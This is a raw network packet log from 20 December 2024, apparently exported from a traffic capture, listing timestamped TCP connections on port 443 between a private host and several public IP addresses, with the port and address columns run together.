                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:11.496056080 CET44349729116.203.12.114192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:11.503643036 CET49742443192.168.2.6116.203.12.114
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:19.609415054 CET49768443192.168.2.6172.217.21.36
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:19.609431028 CET44349768172.217.21.36192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:19.610502005 CET44349768172.217.21.36192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:19.610582113 CET49768443192.168.2.6172.217.21.36
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:19.611027002 CET49768443192.168.2.6172.217.21.36
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:19.611092091 CET44349768172.217.21.36192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:19.611325979 CET49768443192.168.2.6172.217.21.36
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:19.611332893 CET44349768172.217.21.36192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:19.745804071 CET49765443192.168.2.6172.217.21.36
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:19.748269081 CET49768443192.168.2.6172.217.21.36
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:19.761512995 CET49764443192.168.2.6172.217.21.36
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:19.761512995 CET49766443192.168.2.6172.217.21.36
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:19.866761923 CET49766443192.168.2.6172.217.21.36
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:19.866873980 CET44349766172.217.21.36192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:19.867058039 CET44349766172.217.21.36192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:19.867105007 CET49766443192.168.2.6172.217.21.36
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:19.893353939 CET49703443192.168.2.6173.222.162.64
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:19.893454075 CET49703443192.168.2.6173.222.162.64
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:19.902021885 CET49778443192.168.2.6173.222.162.64
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:19.902113914 CET44349778173.222.162.64192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:19.902370930 CET49778443192.168.2.6173.222.162.64
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:19.907102108 CET49778443192.168.2.6173.222.162.64
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:19.907160997 CET44349778173.222.162.64192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:20.012959003 CET44349703173.222.162.64192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:20.012994051 CET44349703173.222.162.64192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:20.388103962 CET44349764172.217.21.36192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:20.388329983 CET44349764172.217.21.36192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:20.388391972 CET49764443192.168.2.6172.217.21.36
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:20.390396118 CET49764443192.168.2.6172.217.21.36
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:20.390441895 CET44349764172.217.21.36192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:20.416599035 CET44349765172.217.21.36192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:20.416659117 CET44349765172.217.21.36192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:20.416687965 CET44349765172.217.21.36192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:20.416713953 CET44349765172.217.21.36192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:20.416737080 CET49765443192.168.2.6172.217.21.36
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:20.416786909 CET44349765172.217.21.36192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:20.416805029 CET49765443192.168.2.6172.217.21.36
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:20.424789906 CET44349765172.217.21.36192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:20.424835920 CET49765443192.168.2.6172.217.21.36
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:20.424848080 CET44349765172.217.21.36192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:20.448323965 CET44349765172.217.21.36192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:20.448466063 CET49765443192.168.2.6172.217.21.36
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:20.448513985 CET44349765172.217.21.36192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:20.458074093 CET44349765172.217.21.36192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:20.458158016 CET49765443192.168.2.6172.217.21.36
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:20.458194017 CET44349765172.217.21.36192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:20.500957966 CET44349768172.217.21.36192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:20.501107931 CET44349768172.217.21.36192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:20.501432896 CET49768443192.168.2.6172.217.21.36
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:20.502187014 CET49768443192.168.2.6172.217.21.36
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:20.502213955 CET44349768172.217.21.36192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:20.536195040 CET44349765172.217.21.36192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:20.536257029 CET49765443192.168.2.6172.217.21.36
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:20.536292076 CET44349765172.217.21.36192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:20.608360052 CET44349765172.217.21.36192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:20.608494043 CET49765443192.168.2.6172.217.21.36
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:20.608527899 CET44349765172.217.21.36192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:20.619383097 CET44349765172.217.21.36192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:20.619601965 CET49765443192.168.2.6172.217.21.36
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:20.619613886 CET44349765172.217.21.36192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:20.629203081 CET44349765172.217.21.36192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:20.629251003 CET49765443192.168.2.6172.217.21.36
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:20.629261017 CET44349765172.217.21.36192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:20.641752958 CET44349765172.217.21.36192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:20.641812086 CET49765443192.168.2.6172.217.21.36
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:20.641819954 CET44349765172.217.21.36192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:20.655385017 CET44349765172.217.21.36192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:20.655436039 CET49765443192.168.2.6172.217.21.36
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:20.655445099 CET44349765172.217.21.36192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:20.667706966 CET44349765172.217.21.36192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:20.667915106 CET49765443192.168.2.6172.217.21.36
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:20.667924881 CET44349765172.217.21.36192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:20.681368113 CET44349765172.217.21.36192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:20.681421041 CET49765443192.168.2.6172.217.21.36
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:20.681431055 CET44349765172.217.21.36192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:20.695079088 CET44349765172.217.21.36192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:20.695122004 CET49765443192.168.2.6172.217.21.36
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:20.695131063 CET44349765172.217.21.36192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:21.038820028 CET44349765172.217.21.36192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:21.038851976 CET49765443192.168.2.6172.217.21.36
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:21.044095993 CET44349765172.217.21.36192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:21.045140028 CET44349765172.217.21.36192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:21.045187950 CET49765443192.168.2.6172.217.21.36
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:21.045530081 CET49765443192.168.2.6172.217.21.36
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:21.045547009 CET44349765172.217.21.36192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:21.248153925 CET44349778173.222.162.64192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:21.248241901 CET49778443192.168.2.6173.222.162.64
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:21.899185896 CET49788443192.168.2.6172.217.21.36
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:21.899243116 CET44349788172.217.21.36192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:21.899698019 CET49788443192.168.2.6172.217.21.36
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:21.906817913 CET49788443192.168.2.6172.217.21.36
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:21.906862020 CET44349788172.217.21.36192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:23.053642035 CET49796443192.168.2.620.198.119.143
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:23.053680897 CET4434979620.198.119.143192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:23.053745031 CET49796443192.168.2.620.198.119.143
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:23.054536104 CET49796443192.168.2.620.198.119.143
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:23.054548979 CET4434979620.198.119.143192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:23.561062098 CET49799443192.168.2.6116.203.12.114
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:23.561098099 CET44349799116.203.12.114192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:23.561165094 CET49799443192.168.2.6116.203.12.114
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:23.561516047 CET49799443192.168.2.6116.203.12.114
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:23.561526060 CET44349799116.203.12.114192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:23.597647905 CET44349788172.217.21.36192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:23.602221012 CET49788443192.168.2.6172.217.21.36
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:23.602257967 CET44349788172.217.21.36192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:23.602624893 CET44349788172.217.21.36192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:23.603425026 CET49788443192.168.2.6172.217.21.36
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:23.603488922 CET44349788172.217.21.36192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:23.658148050 CET49788443192.168.2.6172.217.21.36
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:24.793397903 CET49805443192.168.2.6116.203.12.114
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:24.793448925 CET44349805116.203.12.114192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:24.793505907 CET49805443192.168.2.6116.203.12.114
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:24.794421911 CET49805443192.168.2.6116.203.12.114
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:24.794439077 CET44349805116.203.12.114192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:24.881037951 CET49788443192.168.2.6172.217.21.36
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:24.958980083 CET44349799116.203.12.114192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:24.959036112 CET49799443192.168.2.6116.203.12.114
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:24.959498882 CET49799443192.168.2.6116.203.12.114
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:24.959511042 CET44349799116.203.12.114192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:24.969197035 CET49799443192.168.2.6116.203.12.114
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:24.969218969 CET44349799116.203.12.114192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:25.270040035 CET4434979620.198.119.143192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:25.270102978 CET49796443192.168.2.620.198.119.143
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:25.272612095 CET49796443192.168.2.620.198.119.143
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:25.272634029 CET4434979620.198.119.143192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:25.272918940 CET4434979620.198.119.143192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:25.274450064 CET49796443192.168.2.620.198.119.143
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:25.274507999 CET49796443192.168.2.620.198.119.143
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:25.274518013 CET4434979620.198.119.143192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:25.274643898 CET49796443192.168.2.620.198.119.143
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:25.319336891 CET4434979620.198.119.143192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:25.817071915 CET4434979620.198.119.143192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:25.817661047 CET4434979620.198.119.143192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:25.817720890 CET49796443192.168.2.620.198.119.143
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:25.818120003 CET49796443192.168.2.620.198.119.143
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:25.818145990 CET4434979620.198.119.143192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:25.818157911 CET49796443192.168.2.620.198.119.143
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:26.002779961 CET44349799116.203.12.114192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:26.002872944 CET49799443192.168.2.6116.203.12.114
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:26.002935886 CET44349799116.203.12.114192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:26.002975941 CET44349799116.203.12.114192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:26.002995968 CET49799443192.168.2.6116.203.12.114
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:26.003017902 CET49799443192.168.2.6116.203.12.114
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:26.005153894 CET49799443192.168.2.6116.203.12.114
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:26.005184889 CET44349799116.203.12.114192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:26.201668978 CET44349805116.203.12.114192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:26.201739073 CET49805443192.168.2.6116.203.12.114
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:26.202250004 CET49805443192.168.2.6116.203.12.114
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:26.202256918 CET44349805116.203.12.114192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:26.204035997 CET49805443192.168.2.6116.203.12.114
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:26.204041958 CET44349805116.203.12.114192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:26.204113007 CET49805443192.168.2.6116.203.12.114
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:26.204123974 CET44349805116.203.12.114192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:26.204130888 CET49805443192.168.2.6116.203.12.114
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:26.204137087 CET44349805116.203.12.114192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:26.204169989 CET49805443192.168.2.6116.203.12.114
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:32.175558090 CET49820443192.168.2.6116.203.12.114
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:32.263700962 CET49820443192.168.2.6116.203.12.114
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:32.263755083 CET44349820116.203.12.114192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:32.468209982 CET44349823116.203.12.114192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:32.468274117 CET49823443192.168.2.6116.203.12.114
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:32.468290091 CET44349823116.203.12.114192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:32.468327999 CET49823443192.168.2.6116.203.12.114
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:32.468384981 CET44349823116.203.12.114192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:32.468430996 CET49823443192.168.2.6116.203.12.114
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:32.800188065 CET49823443192.168.2.6116.203.12.114
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:32.800210953 CET44349823116.203.12.114192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:34.279865980 CET49841443192.168.2.620.198.119.143
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:34.279953003 CET4434984120.198.119.143192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:34.280035019 CET49841443192.168.2.620.198.119.143
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:34.280947924 CET49841443192.168.2.620.198.119.143
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:34.280980110 CET4434984120.198.119.143192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:36.387255907 CET49854443192.168.2.6116.203.12.114
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:36.387306929 CET44349854116.203.12.114192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:36.387617111 CET49854443192.168.2.6116.203.12.114
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:36.387773991 CET49854443192.168.2.6116.203.12.114
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:36.387784004 CET44349854116.203.12.114192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:36.489744902 CET4434984120.198.119.143192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:36.489821911 CET49841443192.168.2.620.198.119.143
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:36.495157957 CET49841443192.168.2.620.198.119.143
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:36.495172977 CET4434984120.198.119.143192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:36.495400906 CET4434984120.198.119.143192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:36.497479916 CET49841443192.168.2.620.198.119.143
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:36.497534990 CET49841443192.168.2.620.198.119.143
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:36.497545004 CET4434984120.198.119.143192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:36.497740030 CET49841443192.168.2.620.198.119.143
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:36.523056984 CET49856443192.168.2.6142.250.181.65
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:36.523169041 CET44349856142.250.181.65192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:36.523818016 CET49856443192.168.2.6142.250.181.65
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:36.524281025 CET49856443192.168.2.6142.250.181.65
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:36.524317026 CET44349856142.250.181.65192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:36.539329052 CET4434984120.198.119.143192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:36.980150938 CET49860443192.168.2.62.16.158.169
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:36.980179071 CET443498602.16.158.169192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:36.980468035 CET49860443192.168.2.62.16.158.169
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:36.980827093 CET49860443192.168.2.62.16.158.169
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:36.980839968 CET443498602.16.158.169192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:37.158864021 CET4434984120.198.119.143192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:37.158998013 CET4434984120.198.119.143192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:37.159687042 CET49841443192.168.2.620.198.119.143
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:37.159790993 CET4434984120.198.119.143192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:37.159837008 CET49841443192.168.2.620.198.119.143
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:37.159837008 CET49841443192.168.2.620.198.119.143
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:37.159859896 CET4434984120.198.119.143192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:37.494035959 CET49865443192.168.2.6116.203.12.114
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:37.494049072 CET44349865116.203.12.114192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:37.494720936 CET49865443192.168.2.6116.203.12.114
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:37.497730017 CET49865443192.168.2.6116.203.12.114
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:37.497745991 CET44349865116.203.12.114192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:37.511137009 CET49856443192.168.2.6142.250.181.65
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:37.511668921 CET49860443192.168.2.62.16.158.169
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:37.512170076 CET49870443192.168.2.6142.250.181.65
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:37.512177944 CET44349870142.250.181.65192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:37.512231112 CET49870443192.168.2.6142.250.181.65
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:37.513556004 CET49870443192.168.2.6142.250.181.65
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:37.513566017 CET44349870142.250.181.65192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:37.551341057 CET44349856142.250.181.65192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:37.555330038 CET443498602.16.158.169192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:37.790759087 CET44349854116.203.12.114192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:37.790838003 CET49854443192.168.2.6116.203.12.114
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:37.792025089 CET49854443192.168.2.6116.203.12.114
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:37.792032957 CET44349854116.203.12.114192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:37.794130087 CET49854443192.168.2.6116.203.12.114
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:37.794130087 CET49854443192.168.2.6116.203.12.114
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:37.794137955 CET44349854116.203.12.114192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:37.794152021 CET44349854116.203.12.114192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:38.088474989 CET49878443192.168.2.6162.159.61.3
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:38.088577032 CET44349878162.159.61.3192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:38.088742018 CET49879443192.168.2.6172.64.41.3
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:38.088774920 CET44349879172.64.41.3192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:38.088778019 CET49878443192.168.2.6162.159.61.3
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:38.088835955 CET49879443192.168.2.6172.64.41.3
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:38.089107037 CET49878443192.168.2.6162.159.61.3
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:38.089126110 CET44349878162.159.61.3192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:39.397326946 CET44349870142.250.181.65192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:39.398938894 CET49870443192.168.2.6142.250.181.65
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:39.399020910 CET44349870142.250.181.65192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:39.399271011 CET49870443192.168.2.6142.250.181.65
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:39.399276018 CET44349870142.250.181.65192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:39.444086075 CET49879443192.168.2.6172.64.41.3
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:39.444108009 CET49880443192.168.2.6162.159.61.3
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:39.444185972 CET49870443192.168.2.6142.250.181.65
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:39.475028038 CET49878443192.168.2.6162.159.61.3
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:39.510229111 CET49889443192.168.2.6116.203.12.114
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:39.510293007 CET44349889116.203.12.114192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:39.510571003 CET49889443192.168.2.6116.203.12.114
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:39.510801077 CET49889443192.168.2.6116.203.12.114
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:39.510822058 CET44349889116.203.12.114192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:39.735418081 CET44349878162.159.61.3192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:39.735518932 CET44349878162.159.61.3192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:39.735589027 CET49878443192.168.2.6162.159.61.3
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:39.735680103 CET49878443192.168.2.6162.159.61.3
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:39.735717058 CET44349878162.159.61.3192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:39.736412048 CET44349880162.159.61.3192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:39.736521006 CET44349880162.159.61.3192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:39.736717939 CET49880443192.168.2.6162.159.61.3
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:39.736742973 CET44349879172.64.41.3192.168.2.6
